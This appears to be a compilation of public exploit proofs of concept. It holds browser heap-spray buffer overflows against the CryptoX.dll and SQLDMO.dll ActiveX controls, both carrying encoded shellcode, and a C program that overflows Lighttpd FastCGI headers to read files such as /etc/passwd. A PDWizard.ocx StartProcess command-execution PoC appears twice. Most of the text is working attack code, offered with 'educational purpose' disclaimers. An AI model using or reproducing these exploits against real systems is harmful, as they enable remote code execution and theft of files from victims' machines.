<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------
[b]Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit[/b]
url: http://www.ultrashareware.com/

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.

Heap Spray Technique was developed by SkyLined
(http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)

[b]The "DeleteContext()" is vulnerable too[/b]
-----------------------------------------------------------------------------------
<object id="boom classid=clsid:09C282FE-7DE7-4697-9BE2-1C4F4DA825B3" style="WIDTH: 578px; HEIGHT: 228px"></object>
<input language="JavaScript onclick=tryMe() type=button value=Launch Exploit" />

var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                           "%u652E%u6578%u9000");

var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0c0c0c0c;

  function tryMe()
   {
    var size_buff = 3200;
    var x =  unescape("%0c%0c%0c%0c");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);

    boom.AcquireContext(x,1,1);
   }
    
  function getSpraySlide(spraySlide, spraySlideSize)
   {
    while (spraySlide.length*2<spraySlideSize)
     {
      spraySlide += spraySlide;
     }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return (spraySlide);
   }

var heapBlockSize = 0x100000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (shellcode.length * 2);

var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

for (i=0;i<heapBlocks;i++)
  {
    memory[i] = spraySlide +  shellcode;
  }

</span></span>
</code></pre>

#

/*
* Remote Lighttpd + FastCGI + PHP example exploit
*
* Tested with Lighttpd 1.4.16 and PHP 5.2.4
*
* To avoid abuse there's a "remove me" in the code.
*
* Example:
*
* # ./exploit localhost 80 /etc/passwd
*
* or
*
* # wget --referer="" localhost
* # ./exploit localhost 80 /var/log/lighttpd/access.log
*
*
* Mattias Bengtsson
*
* http://www.secweb.se/
*
*/

#include
#include
#include
#include

#include
#include

#include
#include
#include

int append_header(char *p, int c, int a, int b)
{
    c = 0x41 + (c % 25);

    memset(p, c, a + b + 4);

    p[a + 0 + 0] = ':';
    p[a + 0 + 1] = ' ';
    p[a + b + 2] = '\r';
    p[a + b + 3] = '\n';

    return a + b + 4;
}

int network(const char *host, int port)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, 0);

    addr.sin_family = AF_INET;

    if((he = gethostbyname(host)) == NULL)
        return 0;

    memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length);

    addr.sin_port = htons(port);

    connect(sock, (struct sockaddr *)&addr, sizeof(addr));

    return sock;
}

int main(int argc, char **argv)
{
    char *b, *p;
    int sock, i;
    char tmp[1024];

    if(argc < 4) {
        fprintf(stderr, "Usage: %s <host /> <port /> <file />\n", argv[0]);
        exit(0);
    }

    sock = network(argv[1], atoi(argv[2]));

    if(sock <= 0) {
        fprintf(stderr, "Host down?\n");
        exit(0);
    }
    
    b = p = malloc(0xffff + 0xffff);

    p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
    p += sprintf(p, "Host: %s\r\n", argv[1]);
    p += sprintf(p, "A: A\r\nB: ");

    *p++ = 128;
    *p++ = 0x00;
    *p++ = 0x54;
    *p++ = 0x42;
    *p++ = '\r';
    *p++ = '\n';
    p = 0x00;
    
    p += append_header(p, 0, 4, 1);
    p += append_header(p, 1, 200 , 25079);

    p -= 3631;

    *p++ = 1; // Version
    *p++ = 4; // Type
    *p++ = 0;
    *p++ = 0;

    i = sprintf(tmp, "SCRIPT_FILENAME");
    sprintf(tmp + i, "%s", argv[3]);

    *p++ = 0x00; // Length
    *p++ = 2 + strlen(tmp); // Length
    *p++ = 0x00; // Padding
    *p++ = 0x10;
    *p++ = i; // name_len
    *p++ = strlen(tmp) - i; // var_len

    memcpy(p, tmp, strlen(tmp));

    p += 3631 - 8 - 2;

    p += append_header(p, 2, 200, 40007);
    p += sprintf(p, "\r\n\r\n");

    write(sock, b, (p - b));

    i = read(sock, b, 0xffff);
    *(b + i) = 0;
    
    printf("%s\n", b);

    free(b);
    close(sock);

    return 0;
}

//

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------------
[b]Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution[/b]
url: http://www.microsoft.com

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

[b]<font color="red">greetz to: Wiz001 (be safe brotha... and see soon :D)</font>[/b]

[b]Description:
This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
"StartProcess()" and "SyncShell()"
Using one of them, you'll be able to run every program you like, simply giving to the method the
right argument.
In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
you like.
Anyway, I think you could imagine what impact could have this kind of vulnerability :D

Other dangerous methods of this ocx are:
"SaveAs()"
"CABDefaultURL()"
"CABFileName()"
"CABRunFile()"[/b]
------------------------------------------------------------------------------------------------------

<object classid="clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685" id="test"></object>

<input language="VBScript onclick=tryMe() type=button value=Click here to start the test" />


Sub tryMe()
  test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application;)
End Sub

</span></span>
</code></pre>

#

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------------
[b]Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution[/b]
url: http://www.microsoft.com

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

[b]<font color="red">greetz to: Wiz001 (be safe brotha... and see soon :D)</font>[/b]

[b]Description:
This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
"StartProcess()" and "SyncShell()"
Using one of them, you'll be able to run every program you like, simply giving to the method the
right argument.
In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
you like.
Anyway, I think you could imagine what impact could have this kind of vulnerability :D

Other dangerous methods of this ocx are:
"SaveAs()"
"CABDefaultURL()"
"CABFileName()"
"CABRunFile()"[/b]
------------------------------------------------------------------------------------------------------

<object classid="clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685" id="test"></object>

<input language="VBScript onclick=tryMe() type=button value=Click here to start the test" />


Sub tryMe()
  test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application;)
End Sub

</span></span>
</code></pre>

#

<!--

+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
     code by rgod http://www.milw0rm.com/exploits/4379
     code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)

-->


<object classid="clsid:10020200-E260-11CF-AE68-00AA004A34D5" id="SQLServer"></object>


// Heap Spray
// execute "calc.exe"
shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<501;i++) memory[i] = block + shellcode;




targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4

myseh        = unescape("%u0D0D%u0D0D")   // heap spray range - possible change
StartMode =True
Server    ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\DDDD\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\DDDD\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     ="aaaaaaaa"
Password  ="bbbbbbbb"

SQLServer.Start StartMode ,Server ,Login ,Password



# ]